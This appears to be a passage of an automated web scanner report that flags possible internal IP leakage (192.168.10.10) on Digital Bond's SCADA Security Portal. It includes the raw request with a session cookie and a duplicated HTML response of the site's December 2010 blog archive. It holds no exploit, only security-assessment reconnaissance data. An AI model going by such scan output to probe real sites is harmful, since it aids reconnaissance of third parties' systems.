<meta name='robots' content='noindex,nofollow' /></head><body class="login"><div id="login"><h1><a href="http://wordpress.org/" title="Powered by WordPress">Digital Bond's SCADA Security Portal</a></h1><p class="message register">Register For This Site</p><form name="registerform" id="registerform" action="https://www.digitalbond.com/wp-login.php?action=register" method="post"> <p> <label>Username<br /> <input type="text" name="user_login" id="user_login" class="input" value="" size="20" tabindex="10" /></label> </p> <p> <label>E-mail<br /> <input type="text" name="user_email" id="user_email" class="input" value="" size="25" tabindex="20" /></label> </p><!-- Start code from Cimy User Extra Fields 2.0.3 Copyright (c) 2006-2011 Marco Cimmino http://www.marcocimmino.net/cimy-wordpress-plugins/cimy-user-extra-fields/--> <input type="hidden" name="cimy_post" value="1" /> <p id="cimy_uef_wp_p_field_1"> <label for="cimy_uef_wp_1">First name</label><input type="text" name="cimy_uef_wp_FIRSTNAME" id="cimy_uef_wp_1" class="cimy_uef_input_27" value="" maxlength="20" tabindex="21" /> </p> <p id="cimy_uef_wp_p_field_2"> <label for="cimy_uef_wp_2">Last name</label><input type="text" name="cimy_uef_wp_LASTNAME" id="cimy_uef_wp_2" class="cimy_uef_input_27" value="" maxlength="25" tabindex="22" /> </p> <p id="cimy_uef_wp_p_field_3"> <label for="cimy_uef_wp_3">Password</label><input type="password" name="cimy_uef_wp_PASSWORD" id="cimy_uef_wp_3" class="cimy_uef_input_27" value="" maxlength="16" tabindex="23" /> </p> <p id="cimy_uef_wp_p_field_4"> <label for="cimy_uef_wp_4">Password confirmation</label><input type="password" name="cimy_uef_wp_PASSWORD2" id="cimy_uef_wp_4" class="cimy_uef_input_27" value="" maxlength="16" tabindex="24" /> </p> <h2>Password_Tips</h2> <p id="cimy_uef_p_desc_7" class="desc"><br />Use your weak password on this site. Do not use one of your strong, important passwords because it will be sent in an email.
Registration is free of charge and you will not purchase anything with this account. </p> <p id="cimy_uef_p_field_7"> <input type="checkbox" name="cimy_uef_TIP" id="cimy_uef_7" class="cimy_uef_checkbox" value="1" tabindex="25" /><label class="cimy_uef_label_checkbox" for="cimy_uef_7"> </label><br /> </p> <p id="cimy_uef_p_field_1"> <label for="cimy_uef_1">Enter your company's name</label><input type="text" name="cimy_uef_COMPANY" id="cimy_uef_1" class="cimy_uef_input_27" value="" maxlength="63" tabindex="26" /> </p> <p id="cimy_uef_p_field_5"> <label for="cimy_uef_5">Enter your industry sector</label><input type="text" name="cimy_uef_SECTOR" id="cimy_uef_5" class="cimy_uef_input_27" value="" maxlength="63" tabindex="27" /> </p> <p id="cimy_uef_p_field_6"> <label for="cimy_uef_6">What country are you in?</label><input type="text" name="cimy_uef_COUNTRY" id="cimy_uef_6" class="cimy_uef_input_27" value="" maxlength="25" tabindex="28" /> </p> <div style="width: 278px; float: left; height: 80px; vertical-align: text-top;"> <img id="captcha" align="left" style="padding-right: 5px; border: 0" src="https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/securimage/securimage_show_captcha.php" alt="CAPTCHA Image" /> <object type="application/x-shockwave-flash" data="https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/securimage/securimage_play.swf?audio=https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/securimage/securimage_play.php&bgColor1=#fff&bgColor2=#fff&iconColor=#777&borderWidth=1&borderColor=#000" height="19" width="19"><param name="movie" value="https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/securimage/securimage_play.swf?audio=https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/securimage/securimage_play.php&bgColor1=#fff&bgColor2=#fff&iconColor=#777&borderWidth=1&borderColor=#000" /></object> <br /><br /><br /><br /> <a align="right" tabindex="29" style="border-style: none" href="#" onclick="document.getElementById('captcha').src = 'https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/securimage/securimage_show_captcha.php?' + Math.random(); return false"><img src="https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/securimage/images/refresh.gif" alt="Change image" border="0" onclick="this.blur()" align="bottom" /></a> </div> <div style="width: 278px; float: left; height: 50px; vertical-align: bottom; padding: 5px;"> Insert the code: <input type="text" name="securimage_response_field" size="10" maxlength="6" tabindex="30" /> </div><!-- End of code from Cimy User Extra Fields--> <p id="reg_passmail">A password will be e-mailed to you.</p> <br class="clear" /> <input type="hidden" name="redirect_to" value="" /> <p class="submit"><input type="submit" name="wp-submit" id="wp-submit" class="button-primary" value="Register" tabindex="100" /></p></form><p id="nav"><a href="https://www.digitalbond.com/wp-login.php">Log in</a> |<a href="https://www.digitalbond.com/wp-login.php?action=lostpassword" title="Password Lost and Found">Lost your password?</a></p></div><script type="text/javascript">try{document.getElementById('user_login').focus();}catch(e){}if(typeof wpOnload=='function')wpOnload();</script><p id="backtoblog"><a href="https://www.digitalbond.com/" title="Are you lost?">← Back to Digital Bond's SCADA Security Portal</a></p></body></html>
[Possible] Internal IP Address Leakage
[Possible] Internal IP Address Leakage
1
TOTAL
LOW
Netsparker discovered an internal IP address in the page. It was not determined if the IP address was that of the system itself or that of an internal network.
Impact
This kind of information can be useful for an attacker when combined with other vulnerabilities.
Remedy
First ensure that this is not a false positive. Due to the nature of the issue. Netsparker could not confirm that this IP address was actually the real internal IP address of the target web server or internal network. If it is then consider removing it.
|
- /2010/12/
/2010/12/ |
Extracted IP Address(es)
192.168.10.10
Request
GET /2010/12/ HTTP/1.1
Referer: http://www.digitalbond.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Cookie: PHPSESSID=5c8a40ddb91f1a2acfe18880a9fdfdca; wordpress_test_cookie=WP+Cookie+check
Accept-Encoding: gzip, deflate
Referer: http://www.digitalbond.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Cookie: PHPSESSID=5c8a40ddb91f1a2acfe18880a9fdfdca; wordpress_test_cookie=WP+Cookie+check
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 19:57:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=10
Expires: Tue, 19 Apr 2011 21:57:39 GMT
Cache-Control: max-age=7200, public, must-revalidate, proxy-revalidate
Pragma: public
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 19:57:39 GMT
Vary: Accept-Encoding,Cookie,User-Agent
Etag: 9a14bd71431fb0a62576e097ff9a9f72
Content-Encoding:
X-Type: default
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<title>2010 December | Digital Bond's SCADA Security Portal</title>
<link rel="shortcut icon" href="http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/favicon/fff-link.ico" />
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="http://www.digitalbond.com/xmlrpc.php" />
<link rel="stylesheet" href="http://www.digitalbond.com/?bfa_ata_file=css" type="text/css" media="all" /><link rel="alternate" type="application/rss+xml" title="Digital Bond's SCADA Security Portal » Feed" href="http://www.digitalbond.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Digital Bond's SCADA Security Portal » Comments Feed" href="http://www.digitalbond.com/comments/feed/" /><link rel="stylesheet" href="http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/oiopub-direct/images/style/output.css" type="text/css" /><link rel='stylesheet' id='grunion.css-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/grunion-contact-form/css/grunion.css?ver=3.1.1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icallist.css?ver=1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list_print-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icalprint.css?ver=1' type='text/css' media='print' /><link rel='stylesheet' id='wp_sidebarlogin_css_styles-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/sidebar-login/style.css?ver=3.1.1' type='text/css' media='all' /><link rel='stylesheet' id='blackbirdpie-css-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/twitter-blackbird-pie/css/blackbirdpie.css?ver=20110404' type='text/css' media='all' /><script type='text/javascript' src='http://digibond.wpengine.netdna-cdn.com/wp-includes/js/l10n.js?ver=20101110'></script><script type='text/javascript' src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script><script type='text/javascript' src='http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a'></script><script type='text/javascript' src='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/twitter-blackbird-pie/js/blackbirdpie.js?ver=20110404'></script><link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.digitalbond.com/xmlrpc.php?rsd" /><link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.digitalbond.com/wp-includes/wlwmanifest.xml" /> <link rel='index' title='Digital Bond's SCADA Security Portal' href='http://www.digitalbond.com/' /><!-- All in One SEO Pack - Pro Version 1.72 by Michael Torbert of Semper Fi Web Design[334,412] --><meta name="robots" content="noindex,follow" /><link rel="canonical" href="http://www.digitalbond.com/2010/12/" /><!-- /all in one seo pack Pro Version--><script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script><script type="text/javascript" src="http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/powerpress/player.js"></script><script type="text/javascript"><!--
function powerpress_pinw(pinw){window.open('http://www.digitalbond.com/?powerpress_pinw='+pinw, 'PowerPressPlayer','toolbar=0,status=0,resizable=1,width=460,height=320'); return false;}
powerpress_url = 'http://www.digitalbond.com/wp-content/plugins/powerpress/';
//-->
</script>
<script type="text/javascript" src="http://www.digitalbond.com/?bfa_ata_file=js"></script>
<!--[if IE 6]>
<script type="text/javascript">DD_roundies.addRule("a.posts-icon, a.comments-icon, a.email-icon, img.logo");</script>
<![endif]-->
</head>
<body class="archive date">
<div id="wrapper">
<div id="container">
<table id="layout" border="0" cellspacing="0" cellpadding="0">
<colgroup>
<col class="coltwo" />
<col class="colthree" /></colgroup>
<tr>
<!-- Header -->
<td id="header" colspan="2">
<div id="menu1"><ul id="rmenu2" class="clearfix rMenu-hor rMenu"><li class="page_item"><a href="http://www.digitalbond.com/" title="Digital Bond's SCADA Security Portal"><span>Blog</span></a></li><li class="page_item page-item-15"><a href="http://www.digitalbond.com/scada-security-consulting/" ><span>Consulting</span></a></li><li class="page_item page-item-5499"><a href="http://www.digitalbond.com/critical-intelligence/" ><span>Critical Intelligence</span></a></li><li class="page_item page-item-17"><a href="http://www.digitalbond.com/scadapedia/" ><span>SCADApedia</span></a></li><li class="page_item page-item-5501"><a href="http://www.digitalbond.com/tools/" ><span>Tools</span></a></li><li class="page_item page-item-18"><a href="http://www.digitalbond.com/about-us/" ><span>About Us</span></a></li><li class="page_item page-item-8807"><a href="http://www.digitalbond.com/advertise/" ><span>Advertise</span></a></li></ul></div> <div class="horbar1"> </div> <table id="logoarea" cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td valign="middle" class="logoarea-logo"><a href="http://www.digitalbond.com/"><img class="logo" src="http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/digitalbond_logo_web.png" alt="Digital Bond's SCADA Security Portal" /></a></td><td valign="middle" class="logoarea-title"><div id="oio-banner-1" style="width:728px; float:right;"><a rel="nofollow" target="_blank" href="http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/go.php?id=1" title=""><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/oiopub-direct/uploads/zGN33S_Waterfall Banner - horizontal 2010.gif" alt="" style="width:728px; height:90px; border:0px;" /></a></div><hr class="oio-clear-right" /></td></tr></table> <div class="horbar1"> </div> <div id="menu2" class="menu-whats-hot-container"><ul id="rmenu" class="clearfix rMenu-hor rMenu"><li id="menu-item-8657" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8657"><a><span>What’s Hot:</span></a></li><li id="menu-item-8653" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8653"><a href="http://www.digitalbond.com/tools/bandolier/"><span>Bandolier</span></a></li><li id="menu-item-8654" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8654"><a href="http://www.digitalbond.com/tools/portaledge/"><span>Portaledge</span></a></li><li id="menu-item-8655" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8655"><a href="http://www.digitalbond.com/tools/quickdraw/"><span>Quickdraw SCADA IDS</span></a></li><li id="menu-item-9624" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9624"><a href="http://www.digitalbond.com/category/vulnerabilities/vulnerability-disclosure-vulnerabilities/"><span>Vulnerability Disclosure</span></a></li></ul></div>
</td>
<!-- / Header -->
</tr>
<!-- Main Body -->
<tr id="bodyrow">
<!-- Main Column -->
<td id="middle">
<div class="post-8304 post type-post status-publish format-standard hentry category-1 odd" id="post-8304">
<div class="post-headline"> <h2> <a href="http://www.digitalbond.com/2010/12/31/holiday-news-and-notes/" rel="bookmark" title="Permanent Link to Holiday News and Notes">Holiday News and Notes</a></h2>
</div>
<div class="post-byline">Dale Peterson</div>
<div class="post-bodycopy clearfix"><p>Happy New Year to all our loyal blog readers.</p><ul><li>Rep. Dan Lungren (California), will be the next chairman of the Subcommittee on Cybersecurity, Infrastructure Protection, and Security Technologies (Formerly – Subcommittee on Emerging Threats, Cybersecurity, and Science and Technology). He will be a major player on ICS security legislation in the next two years.</li></ul><ul><li>Tripwire has a <a href="http://www.tripwire.com/_landing/energy-compliance/">useful video interview series</a> with Patrick Miller of EnergySec. It covers NERC CIP, smart grid and Stuxnet. Skip part 1 and maybe part 4.</li></ul><ul><li>Trying to understand the <a href="http://www.nerc.com/filez/enforcement/index.html">December NERC fines</a>. Many are non-CIP, which is to be expected, but the majority of the CIP violations are related to CIP-004-1? We will dig into this in the new year.</li></ul><ul><li>The <a href="http://www.securityincidents.org/membership.asp">Repository of Industrial Security Incidents [RISI]</a> has a sale on membership now. It still seems a bit pricey for the info, but it is the best publicly available set of info on the market.</li></ul><ul><li><a href="http://www.frost.com/prod/servlet/press-release.pag?Src=RSS&docid=218949720">Frost & Sullivan estimates the World SCADA Market</a> at $4,584.5 million in 2009 and estimates this to reach $6,902.4 million in 2016. Growth rate isn’t great, but at least it is positive for those making their livings in ICS.</li></ul><ul><li><a href="http://www.dhs.gov/ynews/releases/pr_1292971482908.shtm">DHS Secretary Napolitano highlights DHS’s major accomplishments in the past year</a>. There is a paragraph on “safeguard and secure cyberspace”. Stop, Think, Connect awareness program is a major accomplishment? Cyberstorm III? If you ever get the chance buy a Cyberstorm participant a drink and ask them privately <a href=http://www.digitalbond.com/2010/12/31/holiday-news-and-notes/> Read More </a></p></div>
<div class="post-footer">31 December 2010 | <a href="http://www.digitalbond.com/2010/12/31/holiday-news-and-notes/#respond" class="comments-link" title="Comment on Holiday News and Notes">Leave a comment</a></div>
</div><!-- / Post -->
<div class="post-8289 post type-post status-publish format-standard hentry category-stuxnet even" id="post-8289">
<div class="post-headline"> <h2> <a href="http://www.digitalbond.com/2010/12/22/will-stuxnet-become-our-christmas-day-bomber/" rel="bookmark" title="Permanent Link to Will Stuxnet become our Christmas day bomber?">Will Stuxnet become our Christmas day bomber?</a></h2>
</div>
<div class="post-byline"> </div>
<div class="post-bodycopy clearfix"><p>Are we asking the right questions about the threats to control systems for 2011? A couple of things I’ve read today have me wondering about this.</p><p>First, I followed Bruce Schneier’s link to <a href="http://emergentchaos.com/archives/2010/12/the-tsas-approach-to-threat-modeling.html" mce_href="http://emergentchaos.com/archives/2010/12/the-tsas-approach-to-threat-modeling.html"--></p><p>Are we asking the right questions about the threats to control systems for 2011? A couple of things I’ve read today have me wondering about this.</p><p>First, I followed Bruce Schneier’s link to <a href="http://emergentchaos.com/archives/2010/12/the-tsas-approach-to-threat-modeling.html">this commentary</a> which talks about terror threat modeling from a software threat modeling point of view, specifically as it relates to some comments from President Obama regarding the TSA and a reference to the 2009 Christmas day bombing attempt. It’s somewhat tangental to control systems but the points are very applicable. Here’s one snippet:</p><blockquote><p>Half of getting the right answer is asking the right questions. If the question the President is hearing is “what can we do to protect against the threat that we saw in the Christmas day bombing (attempt)” then there are three possible interpretations. First is that the right question is being asked at a technical level, and the wrong question is being asked at the top. Second, the wrong questions are being asked up and down the line. Third is that the wrong question is being asked at the top, but it’s the right question for a TSA Administrator who wants to be able to testify before Congress that “everything possible was done.”</p></blockquote><p>The other thing I read this morning was Ralph Langner’s latest comment on <a href="http://www.digitalbond.com/index.php/2010/12/17/friday-news-and-notes-122/#comments">last week’s <a href=http://www.digitalbond.com/2010/12/22/will-stuxnet-become-our-christmas-day-bomber/> Read More </a></p></div>
<div class="post-footer">22 December 2010 | <a href="http://www.digitalbond.com/2010/12/22/will-stuxnet-become-our-christmas-day-bomber/#comments" class="comments-link" title="Comment on Will Stuxnet become our Christmas day bomber?">One comment</a></div>
<ul class="oio-banner-zone" id="oio-banner-2" style="width:610px; height:250px; margin:0 auto;"><li style="width:300px; height:250px; line-height:250px; margin:0 10px 0 0;"><a rel="nofollow" target="_blank" href="http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/go.php?id=7" title="Critical Intelligence"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/oiopub-direct/uploads/ioEI4N_StayUptoDate2.jpg" alt="Critical Intelligence" style="width:300px; height:250px; border:0px;" /></a></li><li style="width:300px; height:250px; line-height:250px; margin:0 0 0 0;"><a rel="nofollow" target="_blank" href="http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/go.php?id=9" title=""><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/oiopub-direct/uploads/tcsHnU_SEL_DigiBond_SecPosters_300x250.gif" alt="" style="width:300px; height:250px; border:0px;" /></a></li></ul>
</div><!-- / Post -->
<div class="post-8282 post type-post status-publish format-standard hentry category-1 odd" id="post-8282">
<div class="post-headline"> <h2> <a href="http://www.digitalbond.com/2010/12/17/friday-news-and-notes-122/" rel="bookmark" title="Permanent Link to Friday News and Notes">Friday News and Notes</a></h2>
</div>
<div class="post-byline">Dale Peterson</div>
<div class="post-bodycopy clearfix"><p>We can’t complain about too much Stuxnet after a one hour podcast with Ralph Langner, but there was a lot of news, analysis and speculation.<p>Gartner Group has a Lessons Learned From Stuxnet document available for purchase. Andrew Ginter read it and had <a href="http://controlsystemsecurity.blogspot.com/2010/12/gartner-security-lessons-learned-from.html">an interesting review</a>.</p><ul><li>The <a href="http://www.jpost.com/IranianThreat/News/Article.aspx?id=199475">Jerusalem Post quotes Ralph Langner</a> as saying Stuxnet set the Iranian nuclear weapons program back two years.</li></ul><ul><li><a href="http://blogs.forbes.com/firewall/2010/12/14/stuxnets-finnish-chinese-connection/">Jeffrey Carr thinks that China is the most likely culprit behind Stuxnet</a>. Hmmm, seems odd but who knows? They get blamed for everything cyber so let’..
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 19:57:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=10
Expires: Tue, 19 Apr 2011 21:57:39 GMT
Cache-Control: max-age=7200, public, must-revalidate, proxy-revalidate
Pragma: public
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 19:57:39 GMT
Vary: Accept-Encoding,Cookie,User-Agent
Etag: 9a14bd71431fb0a62576e097ff9a9f72
Content-Encoding:
X-Type: default
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<title>2010 December | Digital Bond's SCADA Security Portal</title>
<link rel="shortcut icon" href="http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/favicon/fff-link.ico" />
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="http://www.digitalbond.com/xmlrpc.php" />
<link rel="stylesheet" href="http://www.digitalbond.com/?bfa_ata_file=css" type="text/css" media="all" /><link rel="alternate" type="application/rss+xml" title="Digital Bond's SCADA Security Portal » Feed" href="http://www.digitalbond.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Digital Bond's SCADA Security Portal » Comments Feed" href="http://www.digitalbond.com/comments/feed/" /><link rel="stylesheet" href="http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/oiopub-direct/images/style/output.css" type="text/css" /><link rel='stylesheet' id='grunion.css-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/grunion-contact-form/css/grunion.css?ver=3.1.1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icallist.css?ver=1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list_print-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icalprint.css?ver=1' type='text/css' media='print' /><link rel='stylesheet' id='wp_sidebarlogin_css_styles-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/sidebar-login/style.css?ver=3.1.1' type='text/css' media='all' /><link rel='stylesheet' id='blackbirdpie-css-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/twitter-blackbird-pie/css/blackbirdpie.css?ver=20110404' type='text/css' media='all' /><script type='text/javascript' src='http://digibond.wpengine.netdna-cdn.com/wp-includes/js/l10n.js?ver=20101110'></script><script type='text/javascript' src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script><script type='text/javascript' src='http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a'></script><script type='text/javascript' src='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/twitter-blackbird-pie/js/blackbirdpie.js?ver=20110404'></script><link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.digitalbond.com/xmlrpc.php?rsd" /><link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.digitalbond.com/wp-includes/wlwmanifest.xml" /> <link rel='index' title='Digital Bond's SCADA Security Portal' href='http://www.digitalbond.com/' /><!-- All in One SEO Pack - Pro Version 1.72 by Michael Torbert of Semper Fi Web Design[334,412] --><meta name="robots" content="noindex,follow" /><link rel="canonical" href="http://www.digitalbond.com/2010/12/" /><!-- /all in one seo pack Pro Version--><script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script><script type="text/javascript" src="http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/powerpress/player.js"></script><script type="text/javascript"><!--
function powerpress_pinw(pinw){window.open('http://www.digitalbond.com/?powerpress_pinw='+pinw, 'PowerPressPlayer','toolbar=0,status=0,resizable=1,width=460,height=320'); return false;}
powerpress_url = 'http://www.digitalbond.com/wp-content/plugins/powerpress/';
//-->
</script>
<script type="text/javascript" src="http://www.digitalbond.com/?bfa_ata_file=js"></script>
<!--[if IE 6]>
<script type="text/javascript">DD_roundies.addRule("a.posts-icon, a.comments-icon, a.email-icon, img.logo");</script>
<![endif]-->
</head>
<body class="archive date">
<div id="wrapper">
<div id="container">
<table id="layout" border="0" cellspacing="0" cellpadding="0">
<colgroup>
<col class="coltwo" />
<col class="colthree" /></colgroup>
<tr>
<!-- Header -->
<td id="header" colspan="2">
<div id="menu1"><ul id="rmenu2" class="clearfix rMenu-hor rMenu"><li class="page_item"><a href="http://www.digitalbond.com/" title="Digital Bond's SCADA Security Portal"><span>Blog</span></a></li><li class="page_item page-item-15"><a href="http://www.digitalbond.com/scada-security-consulting/" ><span>Consulting</span></a></li><li class="page_item page-item-5499"><a href="http://www.digitalbond.com/critical-intelligence/" ><span>Critical Intelligence</span></a></li><li class="page_item page-item-17"><a href="http://www.digitalbond.com/scadapedia/" ><span>SCADApedia</span></a></li><li class="page_item page-item-5501"><a href="http://www.digitalbond.com/tools/" ><span>Tools</span></a></li><li class="page_item page-item-18"><a href="http://www.digitalbond.com/about-us/" ><span>About Us</span></a></li><li class="page_item page-item-8807"><a href="http://www.digitalbond.com/advertise/" ><span>Advertise</span></a></li></ul></div> <div class="horbar1"> </div> <table id="logoarea" cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td valign="middle" class="logoarea-logo"><a href="http://www.digitalbond.com/"><img class="logo" src="http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/digitalbond_logo_web.png" alt="Digital Bond's SCADA Security Portal" /></a></td><td valign="middle" class="logoarea-title"><div id="oio-banner-1" style="width:728px; float:right;"><a rel="nofollow" target="_blank" href="http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/go.php?id=1" title=""><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/oiopub-direct/uploads/zGN33S_Waterfall Banner - horizontal 2010.gif" alt="" style="width:728px; height:90px; border:0px;" /></a></div><hr class="oio-clear-right" /></td></tr></table> <div class="horbar1"> </div> <div id="menu2" class="menu-whats-hot-container"><ul id="rmenu" class="clearfix rMenu-hor rMenu"><li id="menu-item-8657" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8657"><a><span>What’s Hot:</span></a></li><li id="menu-item-8653" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8653"><a href="http://www.digitalbond.com/tools/bandolier/"><span>Bandolier</span></a></li><li id="menu-item-8654" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8654"><a href="http://www.digitalbond.com/tools/portaledge/"><span>Portaledge</span></a></li><li id="menu-item-8655" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8655"><a href="http://www.digitalbond.com/tools/quickdraw/"><span>Quickdraw SCADA IDS</span></a></li><li id="menu-item-9624" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9624"><a href="http://www.digitalbond.com/category/vulnerabilities/vulnerability-disclosure-vulnerabilities/"><span>Vulnerability Disclosure</span></a></li></ul></div>
</td>
<!-- / Header -->
</tr>
<!-- Main Body -->
<tr id="bodyrow">
<!-- Main Column -->
<td id="middle">
<div class="post-8304 post type-post status-publish format-standard hentry category-1 odd" id="post-8304">
<div class="post-headline"> <h2> <a href="http://www.digitalbond.com/2010/12/31/holiday-news-and-notes/" rel="bookmark" title="Permanent Link to Holiday News and Notes">Holiday News and Notes</a></h2>
</div>
<div class="post-byline">Dale Peterson</div>
<div class="post-bodycopy clearfix"><p>Happy New Year to all our loyal blog readers.</p><ul><li>Rep. Dan Lungren (California), will be the next chairman of the Subcommittee on Cybersecurity, Infrastructure Protection, and Security Technologies (Formerly – Subcommittee on Emerging Threats, Cybersecurity, and Science and Technology). He will be a major player on ICS security legislation in the next two years.</li></ul><ul><li>Tripwire has a <a href="http://www.tripwire.com/_landing/energy-compliance/">useful video interview series</a> with Patrick Miller of EnergySec. It covers NERC CIP, smart grid and Stuxnet. Skip part 1 and maybe part 4.</li></ul><ul><li>Trying to understand the <a href="http://www.nerc.com/filez/enforcement/index.html">December NERC fines</a>. Many are non-CIP, which is to be expected, but the majority of the CIP violations are related to CIP-004-1? We will dig into this in the new year.</li></ul><ul><li>The <a href="http://www.securityincidents.org/membership.asp">Repository of Industrial Security Incidents [RISI]</a> has a sale on membership now. It still seems a bit pricey for the info, but it is the best publicly available set of info on the market.</li></ul><ul><li><a href="http://www.frost.com/prod/servlet/press-release.pag?Src=RSS&docid=218949720">Frost & Sullivan estimates the World SCADA Market</a> at $4,584.5 million in 2009 and estimates this to reach $6,902.4 million in 2016. Growth rate isn’t great, but at least it is positive for those making their livings in ICS.</li></ul><ul><li><a href="http://www.dhs.gov/ynews/releases/pr_1292971482908.shtm">DHS Secretary Napolitano highlights DHS’s major accomplishments in the past year</a>. There is a paragraph on “safeguard and secure cyberspace”. Stop, Think, Connect awareness program is a major accomplishment? Cyberstorm III? If you ever get the chance buy a Cyberstorm participant a drink and ask them privately <a href=http://www.digitalbond.com/2010/12/31/holiday-news-and-notes/> Read More </a></p></div>
<div class="post-footer">31 December 2010 | <a href="http://www.digitalbond.com/2010/12/31/holiday-news-and-notes/#respond" class="comments-link" title="Comment on Holiday News and Notes">Leave a comment</a></div>
</div><!-- / Post -->
<div class="post-8289 post type-post status-publish format-standard hentry category-stuxnet even" id="post-8289">
<div class="post-headline"> <h2> <a href="http://www.digitalbond.com/2010/12/22/will-stuxnet-become-our-christmas-day-bomber/" rel="bookmark" title="Permanent Link to Will Stuxnet become our Christmas day bomber?">Will Stuxnet become our Christmas day bomber?</a></h2>
</div>
<div class="post-byline"> </div>
